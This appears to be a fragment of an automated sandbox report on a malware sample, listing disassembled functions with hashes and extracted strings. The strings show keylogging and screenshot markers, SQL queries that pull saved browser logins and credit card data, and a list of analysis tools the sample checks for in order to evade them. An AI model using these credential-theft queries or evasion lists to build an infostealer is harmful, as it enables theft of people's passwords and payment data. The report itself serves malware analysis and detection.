                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction ID: ebefb513306f4e1a89a743234af7964f533b8db1372f8374952af6211b056d6d
                                                                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction Fuzzy Hash: EA11BB75504280DFDB06CF54D5C4B15BFA1FB84224F24C6ADDC494B296C33AD44ACB62

                                                                                        Non-executed Functions

                                                                                        Function 0BF917F8 Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000001), ref: 0BF91855
                                                                                        • GetKeyState.USER32(00000002), ref: 0BF9189A
                                                                                        • GetKeyState.USER32(00000004), ref: 0BF918DF
                                                                                        • GetKeyState.USER32(00000005), ref: 0BF91924
                                                                                        • GetKeyState.USER32(00000006), ref: 0BF91969
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: State
                                                                                        • String ID:
                                                                                        • API String ID: 1649606143-0
                                                                                        • Opcode ID: 75f92de9eb8e9d8bd6d321a8dee8a814808ae985fc81775b3e2be57408e34a1f
                                                                                        • Instruction ID: b4bcdcb327b2839603a7b6419dad0b6519639ee6da70cce4d1d4182f8131f397
                                                                                        • Opcode Fuzzy Hash: 75f92de9eb8e9d8bd6d321a8dee8a814808ae985fc81775b3e2be57408e34a1f
                                                                                        • Instruction Fuzzy Hash: 7C5183B2C017469EEF11DF99E4483AFBFF4AB05705F148459D148B7290C3B99685CBA1
                                                                                        Function 0BF91808 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000001), ref: 0BF91855
                                                                                        • GetKeyState.USER32(00000002), ref: 0BF9189A
                                                                                        • GetKeyState.USER32(00000004), ref: 0BF918DF
                                                                                        • GetKeyState.USER32(00000005), ref: 0BF91924
                                                                                        • GetKeyState.USER32(00000006), ref: 0BF91969
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: State
                                                                                        • String ID:
                                                                                        • API String ID: 1649606143-0
                                                                                        • Opcode ID: 478ba49c2384275b6d76b313880a2f0eb50c86eabdda6672f53d7e3f02568da1
                                                                                        • Instruction ID: 99905d227907a076d1f20c504e5fa6ec3afb3bd14983128c7c8936bc9a5b338c
                                                                                        • Opcode Fuzzy Hash: 478ba49c2384275b6d76b313880a2f0eb50c86eabdda6672f53d7e3f02568da1
                                                                                        • Instruction Fuzzy Hash: 8F4172B1C017469EEB20DF9AE4483AFBFF4AB04709F248459D149B7290C3B99285CBE1
                                                                                        Function 0B614528 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $(&]q$(aq$Haq
                                                                                        • API String ID: 0-1574058083
                                                                                        • Opcode ID: fd683d0703de832c26df2bb825fb6e98921299cf7511bde13e57556ae2a83228
                                                                                        • Instruction ID: 00dfb142cb4088599444b62a0c76938459769c33f7349499c9087aefb7c86b84
                                                                                        • Opcode Fuzzy Hash: fd683d0703de832c26df2bb825fb6e98921299cf7511bde13e57556ae2a83228
                                                                                        • Instruction Fuzzy Hash: 9D917DB1E002199FDB18DF69C8549AFBAF6EF88710F148929E415EB350DF35D906CBA0
                                                                                        Function 0B61A137 Relevance: 2.0, Strings: 1, Instructions: 710COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fff?
                                                                                        • API String ID: 0-4136771917
                                                                                        • Opcode ID: 9cbbc8348238205332e99c36872eea12984e2d9abb00245909202768510a937c
                                                                                        • Instruction ID: a7b9119b0ec8a97feca389d76c7fc51eac49fec2be71b5b2bf21e737392fede1
                                                                                        • Opcode Fuzzy Hash: 9cbbc8348238205332e99c36872eea12984e2d9abb00245909202768510a937c
                                                                                        • Instruction Fuzzy Hash: 3F62497681061ADFCF11DF90C888AD9B7B2FF99300F1586D5E9086B125E771AAD6CF80
                                                                                        Function 0BF9927E Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9d4b0ed0a445f13e5db7711056f7a94a8566fcd995ee681a07fe37e108093ce
                                                                                        • Instruction ID: 669fc82490a082c07c6b62084776a0dbb08e81f99547eb7546b92eee88348b3b
                                                                                        • Opcode Fuzzy Hash: f9d4b0ed0a445f13e5db7711056f7a94a8566fcd995ee681a07fe37e108093ce
                                                                                        • Instruction Fuzzy Hash: C5D0A72BD49005D6DB000B8578080F4F3B8EFC7516F4531ABD53E93102D25082214608

                                                                                        Executed Functions

                                                                                        Function 0041A640 Relevance: 99.0, Strings: 75, Instructions: 5259COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 003607143D2E16053F3704556C093F1D26271D26$013F130F18$032C152458141226383515$042E1274421023011C$083D0B054E3A142F3D533D300509$0D5B5850690F422E786C6E39325E1D307E095D5F6E68193F782F49580832400816681C527E4A3A2A327E17337A1F764F6A5E382C780F432936683C237E293A0A61$0F252C137A30153C3F741D2B0703$142D06344E1218371C3870021E3D3B283F12$152A1C32$1830213827370A3D59251D091D412B11251C$183B1C311F39111F6B322A1F3C0922$1B023F22$1C15$1E3B2A00$1F3F263A253D280D3F00311B3B5F10392D0734061C1A3617$2005301366241C37260602551C1E1E$201D15296A2B37383A2320$202837371E06072360040B2006123D$21353B076A0032301D$22283A3C1B35112F$243C34121C3209$3009163C6103251D39$312D01756B21073B3D3F04$340E1C3E702121342B682D1B0712$350E36003D091A127531382A0527152B0234051A0820241D2203270B650437140B133C253F2601271A793106$352A3D314310183B070A56253706270A3521$39351F2F1913240633093E5845062D0329030029$394A132D4E2E054C2A66596B383E65104D096F48307E2F334A180961396469582F0A590E493F63653F7A6C3A117B0E134A3815375178711C5972$3B39211268242610352C00$3B3C1D5F4F3E1A0837673E3B0E0B$3D03101F7703382F01$3E3A361B1F040B0723$AVTYtUujGTC$AsSUipwdaWzxxUOolnYfQC$CZcRdnWuVuTPCzYIMLaMhPcVWOrBSWwY$FrIIOlZcKvJrdXFxrrQLatXXQPBZzuUx$FxEoCppErZfPbeIXwEloBjan$GabQFKrbIKZvVcWOABZCKLoeWEjkuWnV$GsPAyJxRJLFRLSKtVXHcKwOeqzeYCHFT$GvjdTlowWNVnGCjMFMEaLPvHJJKlVgbwP$IuwuBHwCbCIr$KNqZPkWAyKcLwlvUllHWtfmISduhHmG$MEEnFdknjQNGs$MlhcvFVmIMjFqOgZRtkmRqOJwhJbvomHU$OTaBGbEPdnABGEWowakgk$QAkxCZefYMTSJjfIXwmNCvv$QyDWlAVVxKXlxYyMTooyBSjjsLIRxztHru$RJaTtxGwTNPgwu$RgbHLcTDapVt$TX@$TX@$TX@$TnNDOWVKJssxpeKhxiggWNxcBgkCkTUXLqSyqoXxOYTX$UgsfWZfYnDetizxWQWmFabk$VDRrftxweScZOeNRIryzoTWpKsIRpqHwZ$Xa@$YPoHaRXxsKaOmJlPvMIWWJHNsRblkQPfxIIIFelKFgkG$agCHnPtRQYHczjwunGhAGUMVjeIQJjRc$bAFwxTMwqVXjoLJPoCaIvf$bApJUnogJOssQhlhBZeKQDmRLfZFKFEZryHWuWLGSleZ$bSsgqSSmrWEF$bksMlokimEGpZcnuSvCIizHMdEfoHsCWh$eCMIUQaLhYaDwO$fLBdMpCbcZVRkZHNztaiMvTambWtPGEudcQuhUwpq$gPduhjVcQypnloaepHyrJ$giaoWJUAUoTwQFVHrPncbm$khQdCFwyEPcpuILRxTfIlfjvfhoNEHqv$mfgiacUuZnfvdSbUoFRBDA$uBgXmZdnaOJQG$|Z@$|Z@$|Z@$|Z@$~$n@
                                                                                        • API String ID: 0-1822258774
                                                                                        • Opcode ID: 80f447dd28fc74389843a3b37e0a5142759b6d9cd5ddded5e4b9b29f89166dc6
                                                                                        • Instruction ID: ad1267573a6cbcfa6a1944d51b73f01fb3663915fd693bddd800a8e386d41722
                                                                                        • Opcode Fuzzy Hash: 80f447dd28fc74389843a3b37e0a5142759b6d9cd5ddded5e4b9b29f89166dc6
                                                                                        • Instruction Fuzzy Hash: 6EC3F6B59002199FDB64DF54CD88BDEB7B8FB48304F1081EAE50AA72A0DB745B85CF94
                                                                                        Function 00418003 Relevance: 93.1, Strings: 71, Instructions: 4326COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$013F130F18$022618043A2D21254C6F49$031A131500020622566853$032C152458141226383515$042E1274421023011C$083D0B054E3A142F3D533D300509$0D5B5850690F422E786C6E39325E1D307E095D5F6E68193F782F49580832400816681C527E4A3A2A327E17337A1F764F6A5E382C780F432936683C237E293A0A61$0F252C137A30153C3F741D2B0703$12283A02321C16344C7E51$1403163B$14161C200E01390139092978684C1E032A2B3E3F150400$142D06344E1218371C3870021E3D3B283F12$152A1C32$1830213827370A3D59251D091D412B11251C$183B1C311F39111F6B322A1F3C0922$1B023F22$1E3B2A00$1F3F263A253D280D3F00311B3B5F10392D0734061C1A3617$2005301366241C37260602551C1E1E$201D15296A2B37383A2320$202837371E06072360040B2006123D$21353B076A0032301D$2A0112201F15291A39171750484239030609302F$3009163C6103251D39$312D01756B21073B3D3F04$340E1C3E702121342B682D1B0712$350E36003D091A127531382A0527152B0234051A0820241D2203270B650437140B133C253F2601271A793106$352A3D314310183B070A56253706270A3521$394A132D4E2E054C2A66596B383E65104D096F48307E2F334A180961396469582F0A590E493F63653F7A6C3A117B0E134A3815375178711C5972$3B39211268242610352C00$3B3C1D5F4F3E1A0837673E3B0E0B$3D03101F7703382F01$AVTYtUujGTC$CZcRdnWuVuTPCzYIMLaMhPcVWOrBSWwY$GabQFKrbIKZvVcWOABZCKLoeWEjkuWnV$GsPAyJxRJLFRLSKtVXHcKwOeqzeYCHFT$GvjdTlowWNVnGCjMFMEaLPvHJJKlVgbwP$HVivgnckGvRsRU$HW$IuwuBHwCbCIr$KNqZPkWAyKcLwlvUllHWtfmISduhHmG$MEEnFdknjQNGs$OTaBGbEPdnABGEWowakgk$QAkxCZefYMTSJjfIXwmNCvv$QyDWlAVVxKXlxYyMTooyBSjjsLIRxztHru$RJaTtxGwTNPgwu$RgbHLcTDapVt$TnNDOWVKJssxpeKhxiggWNxcBgkCkTUXLqSyqoXxOYTX$VDRrftxweScZOeNRIryzoTWpKsIRpqHwZ$YPoHaRXxsKaOmJlPvMIWWJHNsRblkQPfxIIIFelKFgkG$agCHnPtRQYHczjwunGhAGUMVjeIQJjRc$bApJUnogJOssQhlhBZeKQDmRLfZFKFEZryHWuWLGSleZ$bSsgqSSmrWEF$bksMlokimEGpZcnuSvCIizHMdEfoHsCWh$eCMIUQaLhYaDwO$gPduhjVcQypnloaepHyrJ$giaoWJUAUoTwQFVHrPncbm$kDbeHjJMhBpjZ$khQdCFwyEPcpuILRxTfIlfjvfhoNEHqv$mfgiacUuZnfvdSbUoFRBDA$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$okqbLvvHnPxyprbijbnYAgZWwlprrmpAM$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$pRTwpUNNIlUihNEGFprqRQyiQIWfhot$u$uBgXmZdnaOJQG$|Z@$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-3702532575
                                                                                        • Opcode ID: 1782ef946e4027905788cb2f93abb2c37d4dd656371e1beda9b32e140631c302
                                                                                        • Instruction ID: ecbd6ae258b5a8e10d75fcdd76cc5336fc622d7046395050630960346d01e7e5
                                                                                        • Opcode Fuzzy Hash: 1782ef946e4027905788cb2f93abb2c37d4dd656371e1beda9b32e140631c302
                                                                                        • Instruction Fuzzy Hash: 99A30675900218DFDB24DF94DD88BDEB7B5FB48304F1081AAE50AB72A0DB745A8ACF54
                                                                                        Function 00426860 Relevance: 51.9, Strings: 40, Instructions: 1934COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 013F130F18$031A131500020622566853$072305103E$0E01003A033D22671027310935$12283A02321C16344C7E51$162C02333934231F$17091A210C0D31200B380207033D2F0301$1739330A3B07053B131B0F071F1E183E78220B082E$1C123A1F3A1D0706320739$22283A3C1B35112F$23051C3F142E3B4A2D0F0D$23172622220E3D2B09373E33112B$23211A2A2E39031C0B3C2C6F536901071703061C1F$2404083105010521471D051E$270D0B33222806270D342B163D282A$2A381F1A1F$2B0F0D1324001C1F3D3125240529140C015E192C0751$3A0C1206163C20027E112A0A48$@$AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ$C:\\$EbcjQNMUNjZJbHZOFGpurNeQdUOCMGSXQJXYefigD$ElbREMgSLZRLEtYGbIrffgi$FrIIOlZcKvJrdXFxrrQLatXXQPBZzuUx$FxEkRjtkUinqyOvbawXjNRhPynphfAyhO$HVivgnckGvRsRU$IbQjFGZbhbSBOiIGhoNgus$MlhcvFVmIMjFqOgZRtkmRqOJwhJbvomHU$OGlhHciXCHPgdhiFnddYdgN$QKxPixabgRxlhjplMVVoiZWMEKdOvJZJRhDlJyomx$VDRrftxweScZOeNRIryzoTWpKsIRpqHwZ$WSgNxUtiaaTusZeImMdnWspumBJaHZJcCw$XEXmAXSFCYQXYpdJIeEWNpGW$Xa@$dwNnpKurkNmdGfFabupkIdaqSbIdQTnX$eYRcHjMVICOT$mCBqqbcWhWxETdslhQIYoBtANgPVScILIsRcmhinggB$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$pfMqeyINvPcOixFPoIyVWcFYQBeeUngrl$tGYvvCoxBUIrlWeBAbspIkifTaMPPAExx
                                                                                        • API String ID: 0-1876354236
                                                                                        • Opcode ID: d22aca920e5646f1c6d71b63934413f37390d0f7b441083f7d2aa3adf539b840
                                                                                        • Instruction ID: 6b8a15204438c86ed8a95272a29ac8c5957484cdf9bf360818a9a4bc2401bab9
                                                                                        • Opcode Fuzzy Hash: d22aca920e5646f1c6d71b63934413f37390d0f7b441083f7d2aa3adf539b840
                                                                                        • Instruction Fuzzy Hash: 5D13F875A00218DFDB24DF60DD88BDEB779BB48304F1081EAE50AB6260EB745B89CF55
                                                                                        Function 0040F440 Relevance: 45.5, Strings: 35, Instructions: 1792COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .BMP$001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$0F31341E3E342209$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2831160E35193638060D3B19$2D160E112F302F311F062011$31006B092E303634171D111D0B$6:@$7B1A1938$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$Add$DC-KL$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb$QGvOiCWEQFcIEEuTtfojVvW$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$\KeyData.Log$\Screenshot$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gSzQgzUVhRXMbtcGggTehdsSnHcYHDxsSaZubRTbN$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$pUnaLwEsVmkGcweXpdooR$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
                                                                                        • API String ID: 0-2437422834
                                                                                        • Opcode ID: 2a09451a19fc3a858c7764cff89048beebd617c31b7dd217c31231d4cf03ad53
                                                                                        • Instruction ID: 37c63e9db7a30343e743b0f844dcd56ceab7837bc167110cc124e081fefd8dc9
                                                                                        • Opcode Fuzzy Hash: 2a09451a19fc3a858c7764cff89048beebd617c31b7dd217c31231d4cf03ad53
                                                                                        • Instruction Fuzzy Hash: BC031B75900208DFDB14DFA4D998BDEBBB5FF48304F1081AAE50AB72A0DB745A89CF54
                                                                                        Function 004215F0 Relevance: 27.4, Strings: 20, Instructions: 2378COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 031A131500020622566853$12283A02321C16344C7E51$330201260D09352705381D666B42$35627D$3F6052$HVivgnckGvRsRU$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT origin_url, username_value, password_value, length(password_value) FROM logins$TX@$TX@$TX@$TX@$YCSMLssvpbsNz$b$cIQcgPyaCLuuhXPkgYdIkKlqZurEFKprFYRahTMJqkyB$d$grrqJdjTSlWsFQbHmCcsaK$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$|Z@
                                                                                        • API String ID: 0-1232685410
                                                                                        • Opcode ID: fa79632bb5733871340fb6d2326837511d6b308776373bbd0f9016bd3e9bafbe
                                                                                        • Instruction ID: 37e1b0618d1c742275d4e0006f99fb65452f2574a4cb0fea8acbaf271a539141
                                                                                        • Opcode Fuzzy Hash: fa79632bb5733871340fb6d2326837511d6b308776373bbd0f9016bd3e9bafbe
                                                                                        • Instruction Fuzzy Hash: 363307B59002189FDB15DF90DD98BDEB7B8BB48304F0081EAE60AB7260DB745B89CF54
                                                                                        Function 00404B01 Relevance: 26.8, Strings: 21, Instructions: 542COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2D160E112F302F311F062011$C$QGvOiCWEQFcIEEuTtfojVvW$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
                                                                                        • API String ID: 0-161851618
                                                                                        • Opcode ID: 729501b664d5ce1f0f626a0cdcf202789025d02e6cc04da08a82f1ed827aba38
                                                                                        • Instruction ID: 20ced64c99c0b42045c7c473594348e9dafc600ebd5a0ea38016d4a2a5e4d4a5
                                                                                        • Opcode Fuzzy Hash: 729501b664d5ce1f0f626a0cdcf202789025d02e6cc04da08a82f1ed827aba38
                                                                                        • Instruction Fuzzy Hash: 0732E976910109ABCB04DFD4DE94EDEB7B9FF48304F10816AE506B6164EB74AB09CF64
                                                                                        Function 0043C490 Relevance: 17.9, Strings: 14, Instructions: 416COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2$H2@$apatedns$autoit$autoruns$fiddler$idaq$procexp$procmon$tcpview$vmtools$vxstream$windbg$wireshark
                                                                                        • API String ID: 0-2452991404
                                                                                        • Opcode ID: fbb2a5c40773c421e34170fd49f82e9b3ac30d128779f321b4defcdc1efffd2b
                                                                                        • Instruction ID: f80e06c0fef3b8856934a9789d69ac52b875e4b502a4c159ef067fb75723074b
                                                                                        • Opcode Fuzzy Hash: fbb2a5c40773c421e34170fd49f82e9b3ac30d128779f321b4defcdc1efffd2b
                                                                                        • Instruction Fuzzy Hash: E422D6B5800219DFDB64DF94CD89BEDB7B4BB08305F1081EAE50AB7290DB745A88CF59
                                                                                        Function 0043DE40 Relevance: 14.9, Strings: 11, Instructions: 1128COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$@4@$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@$V
                                                                                        • API String ID: 0-251709722
                                                                                        • Opcode ID: 0688fb5d5649b2f1dac82ec21d850af6463c6947bed252e1e87768cd3c2fd680
                                                                                        • Instruction ID: cc3360cb5c9541899a056be6d1bea0c6173e2499934954f18b38579b7796501d
                                                                                        • Opcode Fuzzy Hash: 0688fb5d5649b2f1dac82ec21d850af6463c6947bed252e1e87768cd3c2fd680
                                                                                        • Instruction Fuzzy Hash: BCB24B74910208DFDB14DFA4DD88AEEB7B5FB48300F10816EE506B72A4DB749989CF68
                                                                                        Function 0043AC20 Relevance: 14.3, Strings: 11, Instructions: 527COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 173B001726332E2A$2D160E112F302F311F062011$6E4E507A5B5B56746D6B4E0937001A1D1C20273A0D080E11101C27643C1A13151113331156171D3D07091568323B$6F4E517D5F5D5070626F$782F2523$@1@$@1@$TnYCAzdjcQGm$VVULSSfjoivMBiLiukOSh$kYybOkhfFTYtHvFRDhqrmIlAyYwHVxSblt$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR
                                                                                        • API String ID: 0-972098007
                                                                                        • Opcode ID: aea79b7c3ae6fefb27f1fdae03eb1d28d0449cf94522237a0a716cb4d11eb6d0
                                                                                        • Instruction ID: 9c4e8acc7f397ada768a5828ee474147c3521c013b1c9bbfa114147c1564afe6
                                                                                        • Opcode Fuzzy Hash: aea79b7c3ae6fefb27f1fdae03eb1d28d0449cf94522237a0a716cb4d11eb6d0
                                                                                        • Instruction Fuzzy Hash: D9121CB2D0021CABCB14DFE5DD84EDEBBB8EF58300F10856AE506A7154DB746A49CF94
                                                                                        Function 0043DEC6 Relevance: 13.5, Strings: 10, Instructions: 1037COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@$V
                                                                                        • API String ID: 0-1854482382
                                                                                        • Opcode ID: 659892d54ed9f61900bdcd4bdd071b9337f8a7e81014c1b4408513796efceb7b
                                                                                        • Instruction ID: 9be2f66ad349989d99e9f1ec3c4f1bad477988a2cbcb13b6464e8ba39d9be3b3
                                                                                        • Opcode Fuzzy Hash: 659892d54ed9f61900bdcd4bdd071b9337f8a7e81014c1b4408513796efceb7b
                                                                                        • Instruction Fuzzy Hash: E5A21B75910208DFDB14DF94DD88AEEB7B5FB49300F20816EE406B72A4DB74A989CF58
                                                                                        Function 0043E007 Relevance: 12.2, Strings: 9, Instructions: 977COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-4156325850
                                                                                        • Opcode ID: f2136944edcc98b35c6e585e6c6809f3577d71313a77076afa58242ba83c48af
                                                                                        • Instruction ID: 973959d79bf01337f8a718b0097a0d3f695c2e557d16851888f6515568c1bd85
                                                                                        • Opcode Fuzzy Hash: f2136944edcc98b35c6e585e6c6809f3577d71313a77076afa58242ba83c48af
                                                                                        • Instruction Fuzzy Hash: 32A21A75910208DFDB14DF94DD88AEEB7B5FB49300F20816EE406B72A4DB74A989CF58
                                                                                        Function 00426066 Relevance: 12.0, Strings: 9, Instructions: 778COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
